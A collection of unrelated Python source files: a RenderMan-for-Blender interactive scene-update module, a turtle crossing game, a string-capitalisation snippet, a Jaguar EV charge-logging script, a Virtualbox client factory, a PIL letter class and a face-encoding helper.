if not self.update_instances:
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
# Re-emit instances for all objects in self.update_instances
rfb_log().debug("Re-emit instances")
rman_group_translator = self.rman_scene.rman_translators['GROUP']
for ob_inst in self.rman_scene.depsgraph.object_instances:
parent = None
if ob_inst.is_instance:
ob = ob_inst.instance_object
parent = ob_inst.parent
else:
ob = ob_inst.object
if ob.original not in self.update_instances:
continue
rman_type = object_utils._detect_primitive_(ob)
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
if rman_sg_node:
translator = self.rman_scene.rman_translators.get(rman_type, None)
translator.export_object_primvars(ob, rman_sg_node)
group_db_name = object_utils.get_group_db_name(ob_inst)
rman_sg_group = rman_sg_node.instances.get(group_db_name, None)
if rman_sg_group:
rman_group_translator.update_transform(ob_inst, rman_sg_group)
# object attrs
rman_group_translator.export_object_attributes(ob, rman_sg_group)
if rman_sg_group.bl_psys_settings:
self.rman_scene.attach_particle_material(rman_sg_group.bl_psys_settings, parent, ob, rman_sg_group)
else:
self.rman_scene.attach_material(ob, rman_sg_group)
continue
self.rman_scene._export_instance(ob_inst)
def clear_instances(self, ob, rman_sg_node=None):
rfb_log().debug("Deleting instances")
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if not rman_sg_node:
rman_sg_node = self.rman_scene.rman_objects.get(ob.original)
for k,rman_sg_group in rman_sg_node.instances.items():
if ob.parent and object_utils._detect_primitive_(ob.parent) == 'EMPTY':
rman_empty_node = self.rman_scene.rman_objects.get(ob.parent.original)
rman_empty_node.sg_node.RemoveChild(rman_sg_group.sg_node)
else:
self.rman_scene.get_root_sg_node().RemoveChild(rman_sg_group.sg_node)
rman_sg_node.instances.clear()
def update_materials_dict(self, mat):
# See comment below in update_objects_dict
rman_sg_material = None
for id, rman_sg_node in self.rman_scene.rman_materials.items():
if rman_sg_node:
db_name = object_utils.get_db_name(mat)
if rman_sg_node.db_name == db_name:
self.rman_scene.rman_materials[mat.original] = rman_sg_node
del self.rman_scene.rman_materials[id]
rman_sg_material = rman_sg_node
break
return rman_sg_material
def update_objects_dict(self, ob, rman_type=None):
# Try to see if we already have an obj with the same db_name
# We need to do this because undo/redo causes all bpy.types.ID
# references to be invalidated (see: https://docs.blender.org/api/current/info_gotcha.html)
# We don't want to accidentally mistake this for a new object, so we need to update
# our objects dictionary with the new bpy.types.ID reference
rman_sg_node = None
for id, rsn in self.rman_scene.rman_objects.items():
if rsn:
db_name = object_utils.get_db_name(ob, rman_type=rman_type)
if rsn.db_name == db_name:
self.rman_scene.rman_objects[ob.original] = rsn
del self.rman_scene.rman_objects[id]
if id in self.rman_scene.rman_cameras:
self.rman_scene.rman_cameras[ob.original] = rsn
del self.rman_scene.rman_cameras[id]
rman_sg_node = rsn
break
return rman_sg_node
def update_collection(self, coll):
# mark all objects in a collection
# as needing their instances updated
# the collection could have been updated with new objects
# FIXME: like grease pencil above we seem to crash when removing and adding instances
# of curves, we need to figure out what's going on
for o in coll.all_objects:
if o.type in ('ARMATURE', 'CURVE', 'CAMERA'):
continue
rman_type = object_utils._detect_primitive_(o)
rman_sg_node = self.rman_scene.rman_objects.get(o.original, None)
if not rman_sg_node:
if not self.update_objects_dict(o, rman_type=rman_type):
self.new_objects.add(o)
self.update_instances.add(o)
continue
if rman_type == 'LIGHT':
# Check light visibility. Light visibility is already handled elsewhere
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if self.rman_scene.check_light_local_view(o, rman_sg_node):
continue
self.update_instances.add(o.original)
self.update_particles.add(o)
self.update_geometry_node_instances(o)
def update_geometry_node_instances(self, obj):
def update_geo_instances(nodes):
# look for all point instance nodes
for n in [node for node in nodes if isinstance(node, bpy.types.GeometryNodePointInstance)]:
if n.instance_type == 'OBJECT':
instance_obj = n.inputs['Object'].default_value
if instance_obj:
self.clear_instances(instance_obj)
self.update_particles.add(instance_obj)
self.update_instances.add(instance_obj.original)
elif n.instance_type == 'COLLECTION':
instance_coll = n.inputs['Collection'].default_value
if instance_coll:
self.update_collection(instance_coll)
if rman_constants.BLENDER_VERSION_MAJOR >= 2 and rman_constants.BLENDER_VERSION_MINOR >= 92:
if isinstance(obj, bpy.types.GeometryNodeTree):
rfb_log().debug("Geometry Node Tree updated: %s" % obj.name)
# look for all point instance nodes
update_geo_instances(obj.nodes)
elif hasattr(obj, 'modifiers'):
# This is an object with modifiers. Look for any geometry node trees attached.
node_tree = None
for modifier in obj.modifiers:
if modifier.type == 'NODES':
rfb_log().debug("Geometry Node Tree updated: %s" % modifier.node_group.name)
update_geo_instances(modifier.node_group.nodes)
def update_portals(self, ob):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator = self.rman_scene.rman_translators['LIGHT']
for portal in scene_utils.get_all_portals(ob):
rman_sg_node = self.rman_scene.rman_objects.get(portal.original, None)
if rman_sg_node:
translator.update(portal, rman_sg_node)
def update_scene(self, context, depsgraph):
## FIXME: this function is waaayyy too big and is doing too much stuff
self.new_objects.clear()
self.new_cameras.clear()
self.update_instances.clear()
self.update_particles.clear()
self.do_delete = False # whether or not we need to do an object deletion
self.do_add = False # whether or not we need to add an object
self.num_instances_changed = False # if the number of instances has changed since the last update
self.rman_scene.depsgraph = depsgraph
self.rman_scene.bl_scene = depsgraph.scene
self.rman_scene.context = context
particle_settings_node = None
did_mesh_update = False # did the mesh actually update
prev_num_instances = self.rman_scene.num_object_instances # the number of instances previously
# Check the number of instances. If we differ, an object may have been
# added or deleted
if self.rman_scene.num_object_instances != len(depsgraph.object_instances):
self.num_instances_changed = True
if self.rman_scene.num_object_instances > len(depsgraph.object_instances):
self.do_delete = True
else:
self.do_add = True
self.rman_scene.num_object_instances = len(depsgraph.object_instances)
rfb_log().debug("------Start update scene--------")
for obj in reversed(depsgraph.updates):
ob = obj.id
if isinstance(obj.id, bpy.types.Scene):
self._scene_updated()
elif isinstance(obj.id, bpy.types.World):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_integrator()
self.rman_scene.export_samplefilters()
self.rman_scene.export_displayfilters()
self.rman_scene.export_viewport_stats()
elif isinstance(obj.id, bpy.types.Camera):
rfb_log().debug("Camera updated: %s" % obj.id.name)
if self.rman_scene.is_viewport_render:
if self.rman_scene.bl_scene.camera.data != obj.id:
continue
rman_sg_camera = self.rman_scene.main_camera
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.update_viewport_cam(self.rman_scene.bl_scene.camera, rman_sg_camera, force_update=True)
else:
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for ob, rman_sg_camera in self.rman_scene.rman_cameras.items():
if ob.original.name != obj.id.name:
continue
translator._update_render_cam(ob.original, rman_sg_camera)
elif isinstance(obj.id, bpy.types.Material):
rfb_log().debug("Material updated: %s" % obj.id.name)
self._material_updated(obj)
elif isinstance(obj.id, bpy.types.Mesh):
rfb_log().debug("Mesh updated: %s" % obj.id.name)
did_mesh_update = True
'''
# Experimental code path. We can use context.blend_data.user_map to ask
# what objects use this mesh. We can then loop thru and call object_update on these
# objects.
# We could also try doing the same thing when we add a new Material. i.e.:
# use user_map to figure out what objects are using this material; however, that would require
# two loops thru user_map
users = context.blend_data.user_map(subset={obj.id.original}, value_types={'OBJECT'})
translator = self.rman_scene.rman_translators['MESH']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for o in users[obj.id.original]:
rman_type = object_utils._detect_primitive_(o)
if rman_type != 'MESH':
continue
rman_sg_node = self.rman_scene.rman_objects.get(o.original, None)
translator.update(o, rman_sg_node)
translator.export_object_primvars(o, rman_sg_node)
# material slots could have changed, so we need to double
# check that too
for k,v in rman_sg_node.instances.items():
self.rman_scene.attach_material(o, v)
return
'''
elif isinstance(obj.id, bpy.types.ParticleSettings):
rfb_log().debug("ParticleSettings updated: %s" % obj.id.name)
# Save this particle settings node, so we can check for it later
# when we process object changes
particle_settings_node = obj.id.original
elif isinstance(obj.id, bpy.types.ShaderNodeTree):
if obj.id.name in bpy.data.node_groups:
# this is probably one of our fake node groups with ramps
# update all of the users of this node tree
rfb_log().debug("ShaderNodeTree updated: %s" % obj.id.name)
users = context.blend_data.user_map(subset={obj.id.original})
for o in users[obj.id.original]:
if hasattr(o, 'rman_nodetree'):
o.rman_nodetree.update_tag()
elif hasattr(o, 'node_tree'):
o.node_tree.update_tag()
elif isinstance(obj.id, bpy.types.Object):
particle_systems = getattr(obj.id, 'particle_systems', list())
has_particle_systems = len(particle_systems) > 0
rman_type = object_utils._detect_primitive_(ob)
# grab the object from bpy.data, because the depsgraph doesn't seem
# to get the updated viewport hidden value
ob_data = bpy.data.objects.get(ob.name, ob)
rman_sg_node = self.rman_scene.rman_objects.get(obj.id.original, None)
# NOTE: hide_get() and hide_viewport are two different things in Blender
# hide_get() hides the object from the viewport, but it does not actually remove the object
# as instances of the object can still be visible (ex: in particle systems)
# hide_viewport should be interpreted as an actual deleted object, including
# particle instances.
is_hidden = ob_data.hide_get()
if not rman_sg_node:
rman_sg_node = self.update_objects_dict(obj.id, rman_type=rman_type)
if self.do_add and not rman_sg_node:
rman_type = object_utils._detect_primitive_(ob_data)
if ob_data.hide_get():
# don't add if this hidden in the viewport
continue
if ob.type == 'CAMERA':
self.new_cameras.add(obj.id.original)
else:
if rman_type == 'EMPTY' and ob.is_instancer:
self.update_empty(ob)
else:
if rman_type == 'LIGHT':
# double check if this light is an rman light
# for now, we don't support adding Blender lights in IPR
#
# we can also get to this point when adding new rman lights because
# Blender will tell us a new light has been added before we've had a chance
# to modify its properties to be an rman light, so we don't want to
# add this light just yet.
if not shadergraph_utils.is_rman_light(ob):
self.rman_scene.num_object_instances = prev_num_instances
rfb_log().debug("------End update scene----------")
return
elif rman_type == 'EMPTY':
# same issue can also happen with empty
# we have not been able to tag our types before Blender
# tells us an empty has been added
self.rman_scene.num_object_instances = prev_num_instances
rfb_log().debug("------End update scene----------")
return
rfb_log().debug("New object added: %s" % obj.id.name)
self.new_objects.add(obj.id.original)
self.update_instances.add(obj.id.original)
if rman_type == 'LIGHTFILTER':
# Add Light filters immediately, so that lights
# can reference them ASAP.
self.add_objects()
self.new_objects.remove(obj.id.original)
self.num_instances_changed = False
continue
if rman_sg_node and rman_sg_node.sg_node:
# update db_name
db_name = object_utils.get_db_name(ob, rman_type=rman_type)
rman_sg_node.db_name = db_name
if self.update_object_visibility(rman_sg_node, ob):
continue
else:
continue
if obj.is_updated_transform:
rfb_log().debug("Transform updated: %s" % obj.id.name)
if ob.type in ['CAMERA']:
# we deal with main camera transforms in view_draw
rman_sg_camera = self.rman_scene.rman_cameras[ob.original]
if rman_sg_camera == self.rman_scene.main_camera:
continue
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator._update_render_cam_transform(ob, rman_sg_camera)
continue
if rman_type == 'LIGHTFILTER':
self._light_filter_transform_updated(obj)
elif rman_type == 'GPENCIL':
# FIXME: we shouldn't handle this specifically, but we seem to be
# hitting a prman crash when removing and adding instances of
# grease pencil curves
self._gpencil_transform_updated(obj)
elif rman_type == 'EMPTY':
self.update_empty(ob, rman_sg_node)
elif self.num_instances_changed:
rman_sg_node = self.rman_scene.rman_objects.get(obj.id.original, None)
for instance_obj in rman_sg_node.objects_instanced:
self.clear_instances(instance_obj)
self.update_instances.add(instance_obj)
rman_sg_node.objects_instanced.clear()
else:
# This is a simple transform. We don't clear the instances.
# We always have to update particle systems when the object has transformed
# A transform change can also be triggered when a particle system is removed.
self.update_particles.add(obj.id)
self.update_instances.add(obj.id.original)
self.update_geometry_node_instances(obj.id)
self.do_delete = False
if rman_type == 'LIGHT':
# check if portals are attached
self.update_portals(obj.id.original)
# Check if this object is the focus object of the camera. If it is
# we need to update the camera
rman_sg_camera = self.rman_scene.main_camera
if rman_sg_camera.rman_focus_object and rman_sg_camera.rman_focus_object == rman_sg_node:
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
cam_object = translator.find_scene_camera()
translator.update(cam_object, rman_sg_camera)
if obj.is_updated_geometry:
if is_hidden:
# don't update if this is hidden
continue
rfb_log().debug("Object updated: %s" % obj.id.name)
if has_particle_systems and particle_settings_node:
self.do_delete = False
self.update_particle_settings(obj, particle_settings_node)
else:
# We always update particle systems in the non-num_instance_change case
# because the particle system can be pointing to a whole new particle settings
self.update_particles.add(obj.id)
if not self.num_instances_changed:
if rman_type == 'MESH' and not did_mesh_update:
# if a mesh didn't actually update don't call obj_geometry_updated
rfb_log().debug("Skip object updated: %s" % obj.id.name)
continue
self._obj_geometry_updated(obj)
elif isinstance(obj.id, bpy.types.Collection):
# don't check the collection if we know objects
# were added or deleted in the scene.
if self.do_delete or self.do_add:
continue
rfb_log().debug("Collection updated: %s" % obj.id.name)
self.update_collection(obj.id)
else:
self.update_geometry_node_instances(obj.id)
# call txmake all in case of new textures
texture_utils.get_txmanager().txmake_all(blocking=False)
# add new objs:
if self.new_objects:
self.add_objects()
elif self.do_add:
# if we didn't detect any new objects, but the number of
# instances changed, check our existing objects for object
# deletion and/or visibility
self.delete_objects()
# delete any objects, if necessary
if self.do_delete:
self.delete_objects()
# update any particle systems
self.update_particle_systems()
# re-emit any instances needed
self.reemit_instances()
rfb_log().debug("------End update scene----------")
def add_objects(self):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
rfb_log().debug("Adding new objects:")
self.rman_scene.export_data_blocks(self.new_objects)
self.rman_scene.scene_any_lights = self.rman_scene._scene_has_lights()
if self.rman_scene.scene_any_lights:
self.rman_scene.default_light.SetHidden(1)
def delete_objects(self):
rfb_log().debug("Deleting objects")
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
keys = [k for k in self.rman_scene.rman_objects.keys()]
for obj in keys:
try:
ob = self.rman_scene.bl_scene.objects.get(obj.name_full, None)
# NOTE: objects that are hidden from the viewport are considered deleted
# objects as well
if ob and not ob.hide_viewport:
rman_sg_node = self.rman_scene.rman_objects.get(obj, None)
if rman_sg_node:
# Double check object visibility
self.update_object_visibility(rman_sg_node, ob)
continue
except Exception as e:
pass
rman_sg_node = self.rman_scene.rman_objects.get(obj, None)
if rman_sg_node:
for k,v in rman_sg_node.instances.items():
if v.sg_node:
self.rman_scene.sg_scene.DeleteDagNode(v.sg_node)
rman_sg_node.instances.clear()
# For now, don't delete the geometry itself
# there may be a collection instance still referencing the geo
# self.rman_scene.sg_scene.DeleteDagNode(rman_sg_node.sg_node)
del self.rman_scene.rman_objects[obj]
# We just deleted a light filter. We need to tell all lights
# associated with this light filter to update
if isinstance(rman_sg_node, RmanSgLightFilter):
for light_ob in rman_sg_node.lights_list:
light_key = object_utils.get_db_name(light_ob, rman_type='LIGHT')
rman_sg_light = self.rman_scene.rman_objects.get(light_ob.original, None)
if rman_sg_light:
self.rman_scene.rman_translators['LIGHT'].update_light_filters(light_ob, rman_sg_light)
try:
self.rman_scene.processed_obs.remove(obj)
except ValueError:
rfb_log().debug("Obj not in self.rman_scene.processed_obs: %s")
pass
if self.rman_scene.render_default_light:
self.rman_scene.scene_any_lights = self.rman_scene._scene_has_lights()
if not self.rman_scene.scene_any_lights:
self.rman_scene.default_light.SetHidden(0)
def update_cropwindow(self, cropwindow=None):
if not self.rman_render.rman_interactive_running:
return
if cropwindow:
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
options = self.rman_scene.sg_scene.GetOptions()
options.SetFloatArray(self.rman_scene.rman.Tokens.Rix.k_Ri_CropWindow, cropwindow, 4)
self.rman_scene.sg_scene.SetOptions(options)
def update_integrator(self, context):
if not self.rman_render.rman_interactive_running:
return
if context:
self.rman_scene.bl_scene = context.scene
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_integrator()
self.rman_scene.export_viewport_stats()
def update_viewport_integrator(self, context, integrator):
if not self.rman_render.rman_interactive_running:
return
self.rman_scene.bl_scene = context.scene
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
integrator_sg = self.rman_scene.rman.SGManager.RixSGShader("Integrator", integrator, "integrator")
self.rman_scene.sg_scene.SetIntegrator(integrator_sg)
self.rman_scene.export_viewport_stats(integrator=integrator)
def update_viewport_res_mult(self, context):
if not self.rman_render.rman_interactive_running:
return
if not self.rman_scene.is_viewport_render:
return
if context:
self.rman_scene.context = context
self.rman_scene.bl_scene = context.scene
self.rman_scene.viewport_render_res_mult = float(context.scene.renderman.viewport_render_res_mult)
rman_sg_camera = self.rman_scene.main_camera
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.update_viewport_resolution(rman_sg_camera)
translator.update_transform(None, rman_sg_camera)
self.rman_scene.export_viewport_stats()
def update_global_options(self, context):
if not self.rman_render.rman_interactive_running:
return
self.rman_scene.bl_scene = context.scene
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_global_options()
self.rman_scene.export_hider()
self.rman_scene.export_viewport_stats()
def update_root_node_func(self, context):
if not self.rman_render.rman_interactive_running:
return
self.rman_scene.bl_scene = context.scene
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_root_sg_node()
def update_material(self, mat):
if not self.rman_render.rman_interactive_running:
return
rman_sg_material = self.rman_scene.rman_materials.get(mat.original, None)
if not rman_sg_material:
return
translator = self.rman_scene.rman_translators["MATERIAL"]
has_meshlight = rman_sg_material.has_meshlight
rfb_log().debug("Manual material update called for: %s." % mat.name)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.update(mat, rman_sg_material)
if has_meshlight != rman_sg_material.has_meshlight:
# we're dealing with a mesh light
rfb_log().debug("Manually calling mesh_light_update")
self.rman_scene.depsgraph = bpy.context.evaluated_depsgraph_get()
self._mesh_light_update(mat)
def update_light(self, ob):
if not self.rman_render.rman_interactive_running:
return
rman_sg_light = self.rman_scene.rman_objects.get(ob.original, None)
if not rman_sg_light:
return
translator = self.rman_scene.rman_translators["LIGHT"]
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.update(ob, rman_sg_light)
def update_light_filter(self, ob):
if not self.rman_render.rman_interactive_running:
return
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
if not rman_sg_node:
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.rman_translators['LIGHTFILTER'].update(ob, rman_sg_node)
for light_ob in rman_sg_node.lights_list:
light_key = object_utils.get_db_name(light_ob, rman_type='LIGHT')
rman_sg_light = self.rman_scene.rman_objects.get(light_ob.original, None)
if rman_sg_light:
self.rman_scene.rman_translators['LIGHT'].update_light_filters(light_ob, rman_sg_light)
def update_solo_light(self, context):
if not self.rman_render.rman_interactive_running:
return
# solo light has changed
self.rman_scene.bl_scene = context.scene
self.rman_scene.scene_solo_light = self.rman_scene.bl_scene.renderman.solo_light
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for light_ob in scene_utils.get_all_lights(self.rman_scene.bl_scene, include_light_filters=False):
rman_sg_node = self.rman_scene.rman_objects.get(light_ob.original, None)
if not rman_sg_node:
continue
rm = light_ob.renderman
if not rm:
continue
if rm.solo:
rman_sg_node.sg_node.SetHidden(0)
else:
rman_sg_node.sg_node.SetHidden(1)
def update_un_solo_light(self, context):
if not self.rman_render.rman_interactive_running:
return
# solo light has changed
self.rman_scene.bl_scene = context.scene
self.rman_scene.scene_solo_light = self.rman_scene.bl_scene.renderman.solo_light
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for light_ob in scene_utils.get_all_lights(self.rman_scene.bl_scene, include_light_filters=False):
rman_sg_node = self.rman_scene.rman_objects.get(light_ob.original, None)
if not rman_sg_node:
continue
rm = light_ob.renderman
if not rm:
continue
if self.rman_scene.check_light_local_view(light_ob, rman_sg_node):
continue
rman_sg_node.sg_node.SetHidden(light_ob.hide_get())
def update_viewport_chan(self, context, chan_name):
if not self.rman_render.rman_interactive_running:
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_samplefilters(sel_chan_name=chan_name)
def update_displays(self, context):
if not self.rman_render.rman_interactive_running:
return
self.rman_scene.bl_scene = context.scene
self.rman_scene._find_renderman_layer()
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_displays()
def texture_updated(self, nodeID):
if not self.rman_render.rman_interactive_running:
return
if nodeID == '':
return
tokens = nodeID.split('|')
if len(tokens) < 3:
return
node_name,param,ob_name = tokens
node, ob = scene_utils.find_node_by_name(node_name, ob_name)
if ob is None:
return
ob_type = type(ob)
if isinstance(ob, bpy.types.Material):
ob.node_tree.update_tag()
elif isinstance(ob, bpy.types.NodeTree):
ob.update_tag()
elif ob_type == bpy.types.World:
ob.update_tag()
else:
# light, lightfilters, and cameras
ob.update_tag(refresh={'DATA'})
def flush_texture_cache(self, texture_list):
if not self.rman_render.rman_interactive_running:
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for tex in texture_list:
self.rman_scene.sg_scene.InvalidateTexture(tex)
def update_enhance(self, context, x, y, zoom):
if not self.rman_render.rman_interactive_running:
return
rman_sg_camera = self.rman_scene.main_camera
if rman_sg_camera.projection_shader.name.CStr() != 'PxrCamera':
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
res_x = int(self.rman_scene.viewport_render_res_mult * x)
res_y = int(self.rman_scene.viewport_render_res_mult * y)
projparams = rman_sg_camera.projection_shader.params
projparams.SetVector("enhance", [res_x, res_y, zoom])
rman_sg_camera.sg_camera_node.SetProjection(rman_sg_camera.projection_shader)
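# --- Illustrative sketch (added note, not part of the addon) -----------------
# texture_updated() above expects nodeID strings of the form
# "<node_name>|<param>|<ob_name>". The value below is made up purely for
# illustration; real IDs come from the texture manager.
if __name__ == "__main__":
    sample_node_id = "PxrTexture_diffuse|filename|MyMaterial"  # hypothetical
    node_name, param, ob_name = sample_node_id.split('|')
    print(node_name, param, ob_name)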
|
python
|
import time
from turtle import Screen
from player import Player
from car_manager import CarManager
from scoreboard import Scoreboard
screen = Screen()
screen.setup(width=600, height=600)
screen.tracer(0)
#TODO1: Create the turtle and move it with keypress
player = Player()
screen.listen()
screen.onkey(player.go_up, "Up")
#TODO2: Create and move cars
cars = CarManager()
#TODO5: Create a scoreboard
scoreboard = Scoreboard()
game_is_on = True
while game_is_on:
time.sleep(0.1)
screen.update()
cars.create_car()
cars.move_car()
#TODO3: Detect turtle collision with cars
for car in cars.all_cars:
if car.distance(player) < 20:
game_is_on = False
scoreboard.game_over()
#TODO4: Detect when turtle crosses the finish line
if player.is_at_finish():
player.goto_start()
cars.level_up()
scoreboard.level_up()
screen.exitonclick()
|
python
|
s = list(input('Escriba el string: '))
s[0] = s[0].upper()
print(''.join(s))
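# --- Hedged alternative (added note) -----------------------------------------
# The same effect without the list round-trip, and safe for an empty input:
#   s = input('Escriba el string: ')
#   print(s[:1].upper() + s[1:])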
|
python
|
# -*- coding: utf-8 -*-
"""Charge logging script
This script will download the get_vehicle_status every 5 minutes
and log them locally. Based on the Charge Off-Peak script.
This script is independent from visualization script in order to run it on different computers
"""
import jlrpy
import threading
import datetime
import math
from datetime import date
import os
import configparser
# login info (email and password) and home coordinates are read from $HOME/.jlrpy.ini
# which is an INI file with a single [jlrpy] section, e.g.:
# [jlrpy]
# email = [email protected]
# password = PassW0rd
# home_latitude = <latitude>
# home_longitude = <longitude>
logger = jlrpy.logger
def check_soc():
"""Retrieve vehicle status.
"""
"""!missing: adjust logging frequency to charging speed:
> 100% every 1 Min
> 50% every 2 Min
> 0 every 5 Min
unplugged every 5 Min
"""
threading.Timer(2 * 60, check_soc).start() # Called every 2 minutes
# getting status update
status = { d['key'] : d['value'] for d in v.get_status()['vehicleStatus'] }
current_soc = int(status['EV_STATE_OF_CHARGE'])
charging_status = status['EV_CHARGING_STATUS']
logger.info("current SoC is "+str(current_soc)+"%")
if status['EV_CHARGING_METHOD'] == "WIRED":
logger.info("car is plugged in")
logger.info("charging status is "+charging_status)
p = v.get_position()
position = (p['position']['latitude'], p['position']['longitude'])
logger.info("car geo-position is "+str(position))
position = ", 'POSITION_LATITUDE': " + str(position[0]) + ", 'POSITION_LONGITUDE': " + str(position[1])
t = datetime.datetime.now()
clogfilename = "jaguar-logs/charging-log_" + t.strftime("%Y-%m-%d_%H-%M-%S") + ".json"
clogfile= open(clogfilename,"w+")
logger.info("writing charging log file " + clogfilename)
# getting health status forces a status update
healthstatus = v.get_health_status()
status = { d['key'] : d['value'] for d in v.get_status()['vehicleStatus']}
logtime = ", 'LOGTIMESTAMP': '"+ t.isoformat() +"'}"
clogfile.write(str(status).replace("}", "") + position + logtime)
clogfile.close()
else:
logger.info("car is not plugged in")
config = configparser.ConfigParser()
configfile = os.environ['HOME']+"/.jlrpy.ini"
config.read(configfile)
username = config['jlrpy']['email']
password = config['jlrpy']['password']
home = (float(config['jlrpy']['home_latitude']), float(config['jlrpy']['home_longitude']))
c = jlrpy.Connection(username, password)
v = c.vehicles[0]
logger.info("[*] Logging vehicle status")
check_soc()
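# --- Hedged sketch (added note, not part of the original script) --------------
# The "!missing" note in check_soc() asks for a polling interval that adapts to
# the charging speed. One possible helper, assuming the thresholds quoted there
# refer to the charging rate in %/hour (an assumption, not stated in the script):
def polling_interval(charging_status, rate_percent_per_hour):
    """Return the number of seconds to wait before the next poll (illustrative only)."""
    if charging_status != "CHARGING":   # hypothetical status value
        return 5 * 60                   # unplugged / not charging: every 5 minutes
    if rate_percent_per_hour > 100:
        return 1 * 60                   # very fast charging: every minute
    if rate_percent_per_hour > 50:
        return 2 * 60                   # medium charging speed: every 2 minutes
    return 5 * 60                       # slow charging: every 5 minutes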
|
python
|
from time import sleep
from jumpscale import j
from .VirtualboxClient import VirtualboxClient
JSBASE = j.application.jsbase_get_class()
class VirtualboxFactory(JSBASE):
def __init__(self):
self.__jslocation__ = "j.clients.virtualbox"
JSBASE.__init__(self)
self.logger_enable()
self._client = None
@property
def client(self):
if self._client is None:
self._client = VirtualboxClient()
return self._client
|
python
|
from PIL import ImageFont
class Letter:
""" letter class- each letter is one of these objects, and is rendered in order. """
def __init__(self,char,size,font,color = (255,255,255,255),b=False,i=False,u=False):
"""
char: character.
size: size of letter.
font: PIL truetype font object. TODO: add handling for other types
color: color of letter, RGBA tuple, range 0-255.
b: Bold flag.
i: Italics flag.
u: Underlined flag.
"""
self.char = char
self.size = size
self.font = ImageFont.truetype(font, size)
self.color = color
self.b = b
self.i = i
self.u = u
def get_kerning(self):
""" gets dimensions as tuple(w,h) that it will be when rendered. """
return self.font.getsize(self.char)
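# --- Hedged usage sketch (added note, not part of the original module) --------
# A Letter wraps one character plus its style; get_kerning() reports the size
# it will occupy when rendered. The font path below is an assumption -- point
# it at any TrueType file available on your system.
if __name__ == "__main__":
    letter = Letter('A', 32, "DejaVuSans.ttf", color=(255, 0, 0, 255), b=True)
    width, height = letter.get_kerning()
    print(f"'A' at size 32 renders as {width}x{height} pixels")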
|
python
|
#TODO: Add datadump
|
python
|
# -*- coding: utf-8 -*-
from . import helpers
import os
import shutil
import json
import logging
import sys
import face_recognition
from ringFace.ringUtils import commons
def processUnencoded(imageDir):
"""
Processes any unencoded image in the new-images subdir of a person, and moves it into encoded-images folder.
The encoded face is stored in the same named files in the encodings subdir of the person.
It uses the pretrained convolutional neural network to extract the 128 dimensional encodings.
This model http://dlib.net/python/index.html#dlib.cnn_face_detection_model_v1 is available via the face_recognition package, which wraps dlib.
"""
for personName in os.listdir(imageDir):
newImagesdir=imageDir + "/" + personName + "/new-images"
encodedImagesDir=imageDir + "/" + personName + "/encoded-images"
encodedingsDir=imageDir + "/" + personName + "/encodings"
ignoredImagesDir=imageDir + "/" + personName + "/ignored-images"
if os.path.exists(newImagesdir):
logging.info(f"encoding new faces of {personName} from dir {newImagesdir}")
for newPersonImage in os.listdir(newImagesdir):
logging.debug(f"processing {newPersonImage}")
try:
personImageFile = newImagesdir + "/" + newPersonImage
encoding = encodeImage(personImageFile)
commons.persistEncoding(encoding, encodedingsDir, newPersonImage)
commons.moveFileTo(personImageFile, encodedImagesDir, "File processed")
except helpers.MultiFaceError as err:
logging.debug(f"MultiFaceError on {newPersonImage}")
commons.moveFileTo(err.filename, ignoredImagesDir, "MultiFaceError")
except:
logging.error("Unexpected error:", sys.exc_info()[0])
else:
logging.warn(f"ignoring person {personName}")
def encodeImage(personImageFile):
"""
Takes an image file path as input, and returns the 128 long numpy array of encoding
"""
logging.debug(f"encodeImage {personImageFile}")
face = face_recognition.load_image_file(personImageFile)
face_bounding_boxes = face_recognition.face_locations(face)
#If training image contains exactly one face
if len(face_bounding_boxes) == 1:
face_encoding = face_recognition.face_encodings(face)[0]
return face_encoding
else:
logging.debug(f"{personImageFile} was skipped and can't be used for training")
raise helpers.MultiFaceError(personImageFile)
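# --- Hedged usage sketch (added note, not part of the original module) --------
# processUnencoded() expects one sub-directory per person under imageDir, each
# containing a "new-images" folder to pick up, e.g.:
#
#   faces/
#     alice/
#       new-images/       <- unprocessed photos go here
#       encoded-images/   <- successfully processed photos are moved here
#       encodings/        <- 128-d encodings are written here
#       ignored-images/   <- photos with zero or multiple faces end up here
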